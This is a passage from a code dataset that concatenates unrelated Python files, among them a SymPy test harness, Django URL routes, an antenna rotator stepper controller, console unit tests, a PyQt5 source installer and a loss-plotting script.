(\"OSNEWL\", 0xFFE7, None),\n (\"OSWRCH\", 0xFFEE, None),\n (\"OSWORD\", 0xFFF1, None),\n (\"OSBYTE\", 0xFFF4, None),\n (\"OSCLI\", 0xFFF7, None),\n (\"ACORN_MOS\", 0xFF00, None),\n (\"FRED\", 0xFC00, 0x00FF),\n (\"JIM\", 0xFD00, 0x00FF),\n (\"SHEILA\", 0xFE00, 0x00FF)\n ]\n for name, address, count in labels:\n trace_info.labels.append(Label(name, address, count))\n\ndef sideways_rom(data):\n trace_info = TraceInfo(ROM_LOAD_ADDRESS, data)\n\n add_common_labels(trace_info)\n\n e = enumerate(data)\n\n # Language entry point\n read_metadata_jump(trace_info, e, \"language_entry_point\")\n\n # Service entry point\n read_metadata_jump(trace_info, e, \"service_entry_point\")\n\n # ROM type\n rom_type_flags = read_metadata_byte( \\\n trace_info, \\\n e, \\\n \"rom_type_flags\", \\\n translate_rom_type_flags, \\\n lambda x: \"rom_type_flags: {0}\".format(\", \".join(x)))\n if ROM_TYPE_ARCHITECTURE_6502_CODE not in rom_type_flags:\n raise TraceError(\"Unsupported ROM architecture {0}\".format(rom_type_flags))\n if ROM_TYPE_FLAG_SERVICE not in rom_type_flags:\n raise TraceError(\"Must have a service entry point\")\n\n # Copyright offset\n read_metadata_byte( \\\n trace_info, \\\n e, \\\n \"copyright_offset\", \\\n None, \\\n \".LOBYTE(copyright_string - 1)\")\n\n # Binary version\n read_metadata_byte(trace_info, e, \"binary_version\")\n\n # Title string\n read_metadata_string(trace_info, e, \"title_string\")\n\n # Version string\n read_metadata_string(trace_info, e, \"version_string\")\n\n # Copyright string\n read_metadata_string(trace_info, e, \"copyright_string\")\n\n # Tube relocation address\n if ROM_TYPE_FLAG_HAS_RELOCATION_ADDRESS in rom_type_flags:\n read_metadata_dword(trace_info, e, \"relocation_address\")\n\n return trace_info\n\n","sub_path":"da65trace/parsers/acorn.py","file_name":"acorn.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"153191113","text":"from functools import partial\n\nfrom nose.plugins.attrib import attr\n\nfrom nosedata import solve_generic, solve_9, dsolve_generic, solve_10, solve_10_trig, solve_10_hangs, limit_func, \\\n limit_data, \\\n diff_data, diff_func, integrate_data, integrate_func, solve_basecamp, solve_9_hangs, logsolve, absolve, varsolve\nfrom sympy import solve, simplify\nfrom nosedata import dsolve_func\n\n\n@attr(version='master', dataset='solve')\ndef test_solve_master_gen():\n for t in test_gen_master('solve', solve_generic, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve')\ndef test_solve_moriarty_gen():\n for t in test_gen_moriarty('solve', solve_generic, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='master', dataset='solve-9')\ndef test_solve_9_master_gen():\n for t in test_gen_master('solve-9', solve_9, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve-9')\ndef test_solve_9_moriarty_gen():\n for t in test_gen_moriarty('solve-9', solve_9, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve-9-hangs')\ndef test_solve_9_moriarty_genh():\n for t in test_gen_moriarty('solve-9-hangs', solve_9_hangs, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve-10-hangs')\ndef test_solve_10_moriarty_genh():\n for t in test_gen_moriarty('solve-10-hangs', solve_10_hangs, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve-9-hangs')\ndef 
test_solve_9_moriarty_genh():\n for t in test_gen_moriarty('solve-9-hangs', solve_9_hangs, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='master', dataset='solve-9-hangs')\ndef test_solve_9_master_genh():\n for t in test_gen_master('solve-9-hangs', solve_9_hangs, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve-10-hangs')\ndef test_solve_10_moriarty_genh():\n for t in test_gen_moriarty('solve-10-hangs', solve_10_hangs, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='master', dataset='solve-10-hangs')\ndef test_solve_10_master_genh():\n for t in test_gen_master('solve-10-hangs', solve_10_hangs, partial(check_master, solve)):\n yield t\n\n\n@attr(version='master', dataset='solve-10')\ndef test_solve_10_master_gen():\n for t in test_gen_master('solve-10', solve_10, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve-10')\ndef test_solve_10_moriarty_gen():\n for t in test_gen_moriarty('solve-10', solve_10 + solve_10_trig, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='master', dataset='dsolve')\ndef test_dsolve_master_gen():\n for t in test_gen_master('dsolve', dsolve_generic, partial(check_master, dsolve_func)):\n yield t\n\n\n@attr(version='moriarty', dataset='dsolve')\ndef test_dsolve_moriarty_gen():\n for t in test_gen_moriarty('dsolve', dsolve_generic, partial(check_moriarty, dsolve_func)):\n yield t\n\n\n@attr(version='master', dataset='limit')\ndef test_limit_master_gen():\n for t in test_gen_master('limit', limit_data, partial(check_master, limit_func)):\n yield t\n\n\n@attr(version='moriarty', dataset='limit')\ndef test_limit_moriarty_gen():\n for t in test_gen_moriarty('limit', limit_data, partial(check_moriarty, limit_func)):\n yield t\n\n\n@attr(version='master', dataset='diff')\ndef test_diff_master_gen():\n for t in test_gen_master('diff', diff_data, partial(check_master, diff_func)):\n yield t\n\n\n@attr(version='moriarty', dataset='diff')\ndef test_diff_moriarty_gen():\n for t in test_gen_moriarty('diff', diff_data, partial(check_moriarty, diff_func)):\n yield t\n\n\n@attr(version='master', dataset='integrate')\ndef test_integrate_master_gen():\n for t in test_gen_master('integrate', integrate_data, partial(check_master, integrate_func)):\n yield t\n\n\n@attr(version='moriarty', dataset='integrate')\ndef test_integrate_moriarty_gen():\n for t in test_gen_moriarty('integrate', integrate_data, partial(check_moriarty, integrate_func)):\n yield t\n\n\ndef test_gen_master(name, test_data, check_func):\n header = 'equation,expected,master,status'\n for t in test_gen('nose-{}-master.log'.format(name), header, test_data, check_func):\n yield t\n\n\ndef test_gen_moriarty(name, test_data, check_func):\n header = 'equation,expected,moriarty,status,length'\n for t in test_gen('nose-{}-moriarty.log'.format(name), header, test_data, check_func):\n yield t\n\n\n@attr(version='master', dataset='solve_basecamp')\ndef test_basecamp_solve_master_gen():\n for t in test_gen_master('solve_basecamp', solve_basecamp, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='solve_basecamp')\ndef test_basecamp_solve_moriarty_gen():\n for t in test_gen_moriarty('solve_basecamp', solve_basecamp, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='master', dataset='logsolve')\ndef test_logsolve_master_gen():\n for t in test_gen_master('logsolve', logsolve, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='logsolve')\ndef 
test_logsolve_moriarty_gen():\n for t in test_gen_moriarty('logsolve', logsolve, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='master', dataset='absolve')\ndef test_absolve_master_gen():\n for t in test_gen_master('absolve', absolve, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='absolve')\ndef test_absolve_moriarty_gen():\n for t in test_gen_moriarty('absolve', absolve, partial(check_moriarty, solve)):\n yield t\n\n\n@attr(version='master', dataset='varsolve')\ndef test_varsolve_master_gen():\n for t in test_gen_master('varsolve', varsolve, partial(check_master, solve)):\n yield t\n\n\n@attr(version='moriarty', dataset='varsolve')\ndef test_varsolve_moriarty_gen():\n for t in test_gen_moriarty('varsolve', varsolve, partial(check_moriarty, solve)):\n yield t\n\n\ndef test_gen(log_name, log_header, test_data, check_func):\n with open(log_name, 'w') as f:\n f.write(log_header + '\\n')\n\n for input, expected_answer in test_data:\n yield check_func, input, expected_answer, log_name\n\n\ndef check_master(func, input, expected_answer, log_name):\n answer = None\n status = 'Failed'\n try:\n answer = func(input)\n assert_matches(expected_answer, answer)\n status = 'Passed'\n except Exception as e:\n if answer is None:\n answer = \"{}: {}\".format(e.__class__.__name__, e.message)\n raise\n finally:\n with open(log_name, 'a') as f:\n f.write('\"{}\",\"{}\",\"{}\",{}\\n'.format(input, expected_answer, answer, status))\n\n\ndef check_moriarty(func, input, expected_answer, log_name):\n from sympy.utilities.solution import last_solution, reset_solution\n\n reset_solution()\n answer = None\n status = 'Failed'\n try:\n answer = func(input)\n assert_matches(expected_answer, answer)\n status = 'Passed'\n except Exception as e:\n if answer is None:\n answer = \"{}: {}\".format(e.__class__.__name__, e.message)\n raise\n finally:\n number_of_steps = len([s for s in last_solution() if s.startswith('_')])\n with open(log_name, 'a') as f:\n f.write('\"{}\",\"{}\",\"{}\",{},{}\\n'.format(input, answer_to_str(expected_answer), answer_to_str(answer),\n status, number_of_steps))\n\n\ndef assert_matches(expected, actual):\n if hasattr(expected, 'is_number') and expected.is_number:\n assert simplify(expected - actual) == 0\n return\n if hasattr(expected, 'dummy_eq'):\n assert expected.dummy_eq(actual)\n return\n try:\n assert expected == actual\n except AssertionError:\n if isinstance(expected, list):\n assert len(expected) == len(actual)\n for e, a in zip(expected, actual):\n assert_matches(e, a)\n elif isinstance(expected, dict):\n assert expected.keys() == actual.keys()\n for k in expected.keys():\n assert_matches(expected[k], actual[k])\n else:\n raise\n\n\ndef answer_to_str(answer):\n \"\"\"\n This hack is not needed for sympy master\n \"\"\"\n if isinstance(answer, list):\n return '[' + ', '.join(answer_to_str(a) for a in answer) + ']'\n elif isinstance(answer, dict):\n return '{' + ', '.join(str(k) + ': ' + answer_to_str(v) for k, v in answer.items()) + '}'\n else:\n return str(answer)\n","sub_path":"tests/nose-tests.py","file_name":"nose-tests.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"593682104","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom .views import *\nfrom django.contrib.auth.views import logout\nfrom django.contrib import admin\nfrom django.conf import 
settings\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n    # Examples:\n    # url(r'^$', 'pis_website.views.home', name='home'),\n    # url(r'^blog/', include('blog.urls')),\n    url(r'^pis_admin/student/csv_student/$', csv_student),\n    url(r'^pis_admin/student/csv_financial/$', csv_financial),\n    url(r'^pis_admin/student/csv_grades/$', csv_grades),\n    url(r'^pis_admin/', include(admin.site.urls)),\n    url(r'^$', index),\n    url(r'news/$', news),\n    url(r'events/$', events),\n    url(r'news_view_more/$', news_limit),\n    url(r'real_monitoring/$', real_monitoring),\n    url(r'news_view_more_event/$', news_limit_events),\n    url(r'^events/', include('events.urls')),\n    url(r'^employee/', include('employee.urls')),\n    url(r'^student/', include('student.urls')), \n    url(r'^contact/', include('contact.urls')), \n\n)\nurlpatterns += patterns(\n    'django.views.static',\n    (r'media/(?P<path>.*)',\n     'serve',\n     {'document_root': settings.MEDIA_ROOT}), )\n","sub_path":"pis_website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"653830524","text":"import logging\n\nfrom ergaleia.import_by_path import import_by_path\n\nlog = logging.getLogger(__name__)\n\n\nHANDLERS = dict()\n\n\ndef add_event_handler(name, path):\n    HANDLERS[name] = (path, import_by_path(path))\n\n\ndef dispatch(event):\n    try:\n        path, fn = HANDLERS[event.name]\n    except KeyError:\n        log.error(\"handler for event '{}' not defined\".format(event.name))\n        raise\n    else:\n        log.info(\"dispatching event '{}' to {}\".format(event.name, path))\n        fn(*event.args, **event.kwargs)\n","sub_path":"sqs_event/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"446468581","text":"#!/usr/bin/python\n'''\nCreated on Dec 18, 2017\n\n@author: blake pritchard\n'''\n\nimport os\nimport sys\nimport time\nimport logging\n\n# Import ADC (MCP3208) library.\nfrom mcp3208 import MCP3208\n\n# Import Stepper\nfrom Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor, Adafruit_StepperMotor\n\n\nclass RotationalAxis(object):\n\n    _is_busy = False\n    _adc = 0\n    _stepper = 0\n    _axis_name = \"AxisNameHere\"\n\n    _encoderposition_center = 0\n    _encoderposition_min = 0\n    _encoderposition_max = 0\n\n    _steppercount_center = 0\n    _steppercount_min = 0\n    _steppercount_max = 0\n\n    _target_degrees = 0\n    _stepper_count = 0\n    _steps_per_degree = 2\n    _degrees_per_step = 0.5\n\n    _requires_calibration = True\n    _reverse_movement = False\n\n    def __init__(self, axis_name, stepper, steps_per_degree, adc, adc_channel, stepper_center, stepper_min, stepper_max, encoder_center, encoder_min, encoder_max):\n        self._axis_name = axis_name\n        self._stepper = stepper\n        self._steps_per_degree = steps_per_degree\n        self._degrees_per_step = float(1.0)/self._steps_per_degree\n        self._adc = adc\n        self._adc_channel = adc_channel\n        \n        self._steppercount_center = stepper_center\n        self._steppercount_min = stepper_min\n        self._steppercount_max = stepper_max\n\n        self._encoderposition_center = encoder_center\n        self._encoderposition_min = encoder_min\n        self._encoderposition_max = encoder_max\n\n    def __del__(self):\n        # body of destructor\n        self._stepper = 0 \n\n    def handle_exception(self, e):\n        exc_type, exc_obj, exc_tb = sys.exc_info()\n        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n        logging.critical(\"%s %s %s\", exc_type, fname, exc_tb.tb_lineno)\n        logging.critical(e)\n        
print(exc_type, fname, exc_tb.tb_lineno)\n        print(e)\n        \n        sys.stderr.write(\"Rotator.py: \" + repr(e) + \"\\n\")\n        return 2 \n\n    def get_degrees(self):\n        return float((self.get_stepper_count() / self._steps_per_degree))\n\n    def get_stepper_count(self):\n        return self._stepper_count\n    \n    def set_stepper_count(self, stepper_count):\n        self._stepper_count = stepper_count\n    \n    def reverse_movement(self):\n        self._reverse_movement = not self._reverse_movement\n    \n        #new_max_step = -1 * self._steppercount_min\n        #new_min_step = -1 * self._steppercount_max\n        #self._steppercount_min = new_min_step\n        #self._steppercount_max = new_max_step\n\n        #new_max_encoder = self._encoderposition_min\n        #new_min_encoder = self._encoderposition_max\n        #self._encoderposition_min = new_max_encoder\n        #self._encoderposition_max = new_min_encoder\n\n    #Re-Center\n    def recenter(self):\n        try:\n            logging.info(\"Recentering \" + str(self._axis_name)+\" To Encoder Value: \"+ str(self._encoderposition_center))\n            encoder_position_current = self.read_encoder_average()\n            encoderposition_previous = encoder_position_current\n            logging.info(\"Current Encoder Value = \" + str(encoder_position_current))\n            nSteps = 0\n\n            # set default direction forward\n            is_forward = True\n            direction_required = Adafruit_MotorHAT.FORWARD\n            stepper_incriment = 1\n            limit_label = \"Maximum\"\n\n            # then check to see if we need to go backward\n            if (encoder_position_current > self._encoderposition_center):\n                is_forward = False\n\n            # set reverse if needed\n            if (is_forward is False):\n                direction_required = Adafruit_MotorHAT.BACKWARD\n                stepper_incriment = -1\n                limit_label = \"Minimum\"\n\n            # start motion\n            self._is_busy = True\n            keep_moving = True\n            while (keep_moving is True):\n                nSteps+=stepper_incriment\n                self._stepper.step(1, direction_required, Adafruit_MotorHAT.DOUBLE)\n                encoderposition_previous = encoder_position_current\n                encoder_position_current = self.read_encoder_average()  \n\n                # check to see if the encoder value is bouncing, if so then re-read encoder\n                if( abs(encoder_position_current - encoderposition_previous) > 4 ):\n                    logging.warning(\"Received Unexpected Encoder with Previous Value: \"+str(encoderposition_previous)+\"; New Outlier Value: \"+str(encoder_position_current)+\"; sleeping 1 second\")\n                    time.sleep(1)\n                    encoder_position_current = self.read_encoder_average()\n                    encoderposition_previous = encoder_position_current\n                    logging.warning(\"Re-Reading Encoder with New Value \"+str(encoder_position_current))\n                logging.info(\"Steps: \" + str(nSteps) + \", \"+str(encoder_position_current))\n\n                if ((is_forward is True) and (encoder_position_current > self._encoderposition_center)):\n                    logging.info(\"Stepping Forward, Found Center at: \" + str(encoder_position_current))\n                    keep_moving = False\n                if ((is_forward is False) and (encoder_position_current < self._encoderposition_center)):\n                    logging.info(\"Stepping Backward, Found Center at: \" + str(encoder_position_current))\n                    keep_moving = False\n                if False == self.check_encoder_limits(encoder_position_current):\n                    logging.warning(\" Exceeded \"+limit_label+\" Encoder Limit Value at: \" + str(encoder_position_current)+ \"; stopping.\")\n                    keep_moving = False\n\n\n            self._is_busy = False\n            logging.info(\"Total Steps: \" + str(nSteps))\n            \n            self.set_stepper_count(self._steppercount_center)\n            self._requires_calibration = False\n            logging.info(\"Current Reading: \"+str(self.get_degrees())+\" \"+str(self._axis_name)+ \", Now Centered on Tripod with Encoder Position = \" + str(self._adc.read(self._adc_channel)))\n\n            return self.get_degrees()\n\n        except Exception as e:\n            self.handle_exception(e)\n            return e\n\n\n\n    # Set Position Based On Stepper Count\n    def set_position(self, _target):\n        try: \n            if(self._requires_calibration == True):\n                self.recenter()\n            \n            steps_required, self.target = self.calculate_steps(_target)\n\n            logging.debug(\"Position Target: \"+ str(self.target) +\"; degrees per step: \" + str(self._degrees_per_step) ) \n\n            _current_degrees = self.get_degrees()\n            if _target == _current_degrees:\n                logging.info(\"Holding Steady at: \"+ str(_target))\n            else:\n                \n                encoder_position_current = self.read_encoder_average()\n\n                # set default direction forward\n                is_forward = True\n                direction_required = Adafruit_MotorHAT.FORWARD\n                direction_label = \"Clockwise\"\n                limit_label = \"Maximum\"\n                stepper_incriment = 1\n                \n                # then check to see if we need to go backward\n                if steps_required < 0:\n                    is_forward = False\n\n                #check for reverse gear ratio (Elevation)\n                if self._reverse_movement == True:\n                    is_forward = not is_forward\n                    stepper_incriment *= -1\n\n                if(is_forward == False):\n                    direction_required = Adafruit_MotorHAT.BACKWARD\n                    direction_label = \"CounterClockwise\"\n                    limit_label = \"Minimum\"\n                    stepper_incriment *= -1\n                \n                logging.info(\" Target: \"+str(_target)+\", Current: \"+str(_current_degrees))\n                logging.info(\" Stepper Count: \"+str(self.get_stepper_count())+\", Moving \"+str(direction_label)+\" by Estimated: \" + str(steps_required) + \" steps.\")\n\n                #execute rotation   \n                self._is_busy = True    \n                for steps_taken in range(abs(steps_required)):  \n                    \n                    # Step Motor\n                    self._stepper.step(1, direction_required, Adafruit_MotorHAT.DOUBLE)\n\n                    # Set Value to Be Returned to GPredict  \n                    self.set_stepper_count(self.get_stepper_count() + stepper_incriment)\n                    encoder_position_current = self._adc.read(self._adc_channel)\n                    \n                    logging.debug(\"Interim Stepper Count:\"+str(self.get_stepper_count())+\"; Interim Degrees: \" + str(self.get_degrees()) + \" EncoderValue: \"+ str(encoder_position_current))\n\n                    # Check Limits\n                    if ((self.get_stepper_count() > self._steppercount_max) or (self.get_stepper_count() < self._steppercount_min)):\n                        logging.warning(\" Exceeded \"+limit_label+\" Stepper Limit Value at: \" + str(self.get_stepper_count())+ \"; Re-Centering.\")\n                        self.recenter()\n                        break\n                    if False == self.check_encoder_limits(encoder_position_current):\n                        logging.warning(\" Exceeded \"+limit_label+\" Encoder Limit Value at: \" + str(encoder_position_current)+ \"; Re-Centering.\")\n                        self.recenter()\n                        break\n\n                self._is_busy = False\n                logging.info(\"New Stepper Count: \"+str(self.get_stepper_count())+\"; New Degrees: \" + str(self.get_degrees()) + \" EncoderValue: \"+ str(encoder_position_current))\n            return self.get_degrees()\n            \n        except Exception as e:\n            self.handle_exception(e)\n            return e\n\n    def calculate_steps(self, _target):\n        try:\n            steps = int(0)\n            _remainder = 0.0\n\n            self._target_degrees = float(_target)\n            logging.debug(\"Calculating Steps to Target: \"+str(self._target_degrees) + \", with: \"+ str(self._steps_per_degree) + \" Steps Per Degree.\")\n\n            #round down to nearest half degree\n            _remainder = self._target_degrees % self._degrees_per_step\n            _target = float(self._target_degrees - _remainder)\n            \n            #round back up if remainder was closer to upper bound\n            if _remainder > (self._degrees_per_step / 2):\n                _target += self._degrees_per_step\n\n            degrees = float(_target) - float(self.get_degrees())\n            steps = int(self._steps_per_degree * degrees)\n            logging.debug(\"Steps Per Degree: \"+ str(self._steps_per_degree) +\"; Degrees: \"+str(degrees)+\"; Steps: \" + str(steps)+ \"; Remainder: \"+ str(_remainder))  \n            \n            return steps, _target\n\n        except Exception as e:\n            self.handle_exception(e)\n\n\n    def check_encoder_limits(self, encoder_position_current):\n        try:\n            is_within_limits = True\n            if (encoder_position_current > self._encoderposition_max):\n                logging.warning(\"Current Encoder Value of: \"+str(encoder_position_current)+\" Exceeded Maximum Encoder Value of: \" + str(self._encoderposition_max))\n                is_within_limits = False\n            if (encoder_position_current < self._encoderposition_min):\n                logging.warning(\"Current Encoder Value of: \"+str(encoder_position_current)+\" Exceeded Minimum Encoder Value of: \" + str(self._encoderposition_min))\n                is_within_limits = False\n            return is_within_limits\n\n        except Exception as e:\n            self.handle_exception(e)\n\n\n    def read_encoder_average(self):\n        num_samples = 6\n        sample_subtotal = 0\n        for i in range(0, num_samples):\n            sample_subtotal += self._adc.read(self._adc_channel)\n\n        encoder_average = sample_subtotal/num_samples\n        logging.debug(\"Encoder Average: \" + str(encoder_average))\n        encoder_tuple = divmod(encoder_average, 1.0)\n        logging.debug(\"Encoder Rounded: \" + str(encoder_tuple[0]))\n        return encoder_tuple[0]\n\n    def stop(self):\n        try: \n            logging.info(\" Stop\")\n            self._stepper.run(Adafruit_MotorHAT.RELEASE)  \n            self._requires_calibration = True\n        except Exception as e:\n            self.handle_exception(e)\n        \n    ","sub_path":"RadioAntenna/PiCode/SatTrackerPi_Gamma/Rotator/RotationalAxis.py","file_name":"RotationalAxis.py","file_ext":"py","file_size_in_byte":12446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"329827205","text":"#!/usr/bin/python3\n\"\"\"[summary]\n\"\"\"\nfrom unittest import TestCase\nfrom unittest.mock import patch\nfrom io import StringIO\nfrom console import HBNBCommand\nimport os\nimport sys\n\n\nclass TestConsole(TestCase):\n    \"\"\"[Test console]\n\n    Args:\n        TestCase ([obj]): [TestCase from unittest module]\n    \"\"\"\n    def setUp(self):\n        \"\"\"[setup method]\n        \"\"\"\n        pass\n\n    def tearDown(self):\n        \"\"\"[teardown method]\n        \"\"\"\n        try:\n            os.remove(\"file.json\")\n        except FileNotFoundError:\n            pass\n\n    def test_class_name_missing(self):\n        \"\"\"[test class name]\n        \"\"\"\n        with patch('sys.stdout', new=StringIO()) as f:\n            HBNBCommand().onecmd(\"create\")\n            msg = f.getvalue()[:-1]\n            self.assertEqual(msg, \"** class name missing **\")\n\n    def test_wrong_class(self):\n        \"\"\"[test wrong class]\n        \"\"\"\n        with patch('sys.stdout', new=StringIO()) as f:\n            HBNBCommand().onecmd(\"create bouhabra\")\n            msg = f.getvalue()[:-1]\n            self.assertEqual(msg, \"** class doesn't exist **\")\n\n    def test_id_type(self):\n        \"\"\"[test type id]\n        \"\"\"\n        with patch('sys.stdout', new=StringIO()) as f:\n            HBNBCommand().onecmd(\"create User\")\n            msg = f.getvalue()[:-1]\n            self.assertEqual(type(msg), str)\n\n    def test_all_output_type(self):\n        \"\"\"[test type]\n        \"\"\"\n        with patch('sys.stdout', new=StringIO()) as f:\n            HBNBCommand().onecmd(\"all\")\n            msg = f.getvalue()[:-1]\n            self.assertEqual(type(msg), str)\n\n    def test_create_user(self):\n        \"\"\"[test_user]\n        \"\"\"\n        with patch('sys.stdout', new=StringIO()) as f:\n            HBNBCommand().onecmd('create User name=\"lothric\"')\n            HBNBCommand().onecmd('all User')\n            msg = f.getvalue()[:-1]\n            self.assertTrue(\"'name': 'lothric'\" in msg)\n\n    def test_decimal(self):\n        \"\"\"[test_decimal]\n        \"\"\"\n        with 
patch('sys.stdout', new=StringIO()) as f:\n HBNBCommand().onecmd('create User number_bathrooms=4')\n HBNBCommand().onecmd('all User')\n msg = f.getvalue()[:-1]\n self.assertTrue(\"'number_bathrooms': 4\" in msg)\n\n def test_float(self):\n \"\"\"[test_float]\n \"\"\"\n with patch('sys.stdout', new=StringIO()) as f:\n HBNBCommand().onecmd('create User price=0.069')\n HBNBCommand().onecmd('all User')\n msg = f.getvalue()[:-1]\n self.assertTrue(\"'price': 0.069\" in msg)\n","sub_path":"tests/test_console.py","file_name":"test_console.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"199824210","text":"#!C:\\Users\\ancar\\Documents\\Git\\HomegrownAero\\Python\\SerialTest\\venv\\Scripts\\python.exe\n\"\"\"\nThis program installs PyQt5 from source. The steps are:\n\n 1. Download and install SIP\n 2. Download and install PyQt5\n\nRemember that Qt5 has to be installed already in your system, and qmake has to\nbe in the path in order to be invoked from the script. If qmake is not in your\npath, you should use the --qmake argument to explicit where it is.\n\nIf you are on MAC OS, you can install Qt5 using brew:\n\n brew install qt5\n\nIf you are on LINUX, you should be able to install Qt5 from your distribution\nrepositories.\n\nWINDOWS is not supported by this script, sorry.\n\nUsage:\n install_pyqt5.py [--qmake QMAKE_PATH]\n\nOptions:\n -h --help Shows this screen\n --qmake QMAKE_PATH Path to qmake executable\n\n\"\"\"\nimport platform\nimport wget\nimport tarfile\nimport subprocess\nimport blessings\nfrom docopt import docopt\n\nSIP_VERSION = '4.18.1'\nPYQT_VERSION = '5.7'\nSIP_NIX_URL = 'http://sourceforge.net/projects/pyqt/files/sip/' + \\\n 'sip-{0}/sip-{0}.tar.gz'.format(SIP_VERSION)\nPYQT_NIX_URL = 'https://sourceforge.net/projects/pyqt/files/PyQt5/' + \\\n 'PyQt-{0}/PyQt5_gpl-{0}.tar.gz'.format(PYQT_VERSION)\n\n\nclass PlatformNotSupportedException(Exception):\n\n def __init__(self, plat):\n self._platform = plat\n\n def __str__(self):\n return \"Sorry, your platform '{}' is not supported\".format(\n self._platform)\n\n\nclass Installer(object):\n\n @property\n def name(self):\n return self._name\n\n @property\n def version(self):\n return self._version\n\n @property\n def url(self):\n return self._url\n\n def __init__(self, name, version, url):\n self._name = name\n self._version = version\n self._url = url\n self._filename = ''\n self._folder = ''\n\n def download(self):\n self._filename = wget.download(self.url)\n\n def extract(self):\n if self._filename.endswith(\".gz\"):\n tar = tarfile.open(self._filename, 'r:gz')\n tar.extractall('.')\n self._folder = tar.getnames()[0]\n\n def configure(self, params=''):\n platform.os.chdir(self._folder)\n subprocess.check_call(['python', 'configure.py'] + params.split())\n\n def install(self):\n subprocess.check_call(['make'])\n subprocess.check_call(['make', 'install'])\n\n def cleanup(self):\n platform.os.chdir('../')\n if self._folder or self._filename:\n subprocess.check_call(['rm', '-r', self._folder, self._filename])\n\n\ndef install_helper(installer, config_params='', mac_patch=False):\n t = blessings.Terminal()\n name = '{0.name} {0.version}'.format(installer)\n try:\n print(t.bold(\"\\nDownloading {} from {}...\".format(\n name, installer.url)))\n installer.download()\n print(t.bold(\"\\n\\nExtracting {}...\".format(name)))\n installer.extract()\n print(t.bold('\\nConfiguring {}...'.format(name)))\n installer.configure(config_params)\n 
print(t.bold('\\nInstalling {}...'.format(name)))\n installer.install()\n except subprocess.CalledProcessError:\n exit()\n else:\n print(t.bold_green('\\n{} installed succesfully...'.format(name)))\n finally:\n print(t.bold('Cleaning up...\\n'))\n installer.cleanup()\n\n\ndef check_platform():\n try:\n plat = platform.system()\n if plat == \"Darwin\" or plat == \"Linux\":\n return SIP_NIX_URL, PYQT_NIX_URL\n else:\n raise PlatformNotSupportedException(plat)\n except PlatformNotSupportedException as e:\n print(blessings.Terminal().bold_red(str(e)))\n exit()\n\n\nif __name__ == '__main__':\n arguments = docopt(__doc__)\n sip_url, pyqt_url = check_platform()\n\n # SIP\n install_helper(Installer('SIP', SIP_VERSION, sip_url))\n\n # PyQt5\n config_params = ''\n if arguments.get('--qmake'):\n config_params = '--qmake ' + arguments['--qmake'] + ' --verbose'\n\n install_helper(\n Installer('PyQt5', PYQT_VERSION, pyqt_url),\n config_params\n )\n","sub_path":"Python/SerialTest/venv/Scripts/install_pyqt5.py","file_name":"install_pyqt5.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"74718685","text":"#coding:utf-8\nimport sys\nimport re\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nin_log_path='./fcn_2017-10-19_22-51-51.txt' #输入日志文件的位置\nout_fig_path='./log.jpg' #输出图片的位置\nf=open(in_log_path,'r')\nloss=[]\n#train_loss=[]\n#test_loss=[]\n\nmax_iter=0\ntest_iter=0\ntest_interval=20\ndisplay=0\n#target_str=['accuracy = ','Test net output #1: loss = ','Train net output #0: loss = ',\n# 'max_iter: ','test_iter: ','test_interval: ','display: ']\ntarget_str=[', loss = ']\nwhile True:\n line=f.readline()\n # print len(line),line\n if len(line)<1:\n break\n for i in range(len(target_str)):\n str=target_str[i]\n idx = line.find(str)\n if idx != -1:\n num=float(line[idx + len(str):idx + len(str) + 6])\n if(i==0):\n loss.append(num)\n else:\n pass\nf.close()\n# print test_iter\n# print max_iter\n# print test_interval\n# print len(accuracy),len(test_loss),len(train_loss)\n\n_,ax1=plt.subplots()\n#ax2=ax1.twinx()\n\n#绘制accuracy曲线图像,颜色为红色'r'\nax1.plot(test_interval*np.arange(len(loss)),loss,color='r',label='loss',linestyle='-')\n\n#ax1.legend(loc=(0.7,0.8)) #使用二元组(0.7,0.8)定义标签位置\n#ax2.legend(loc=(0.7,0.72))\nax1.set_xlabel('iteration')#设置X轴标签\nax1.set_ylabel('loss') #设置Y1轴标签\n\nplt.savefig(out_fig_path,dpi=100) #将图像保存到out_fig_path路径中,分辨率为100\nplt.show() 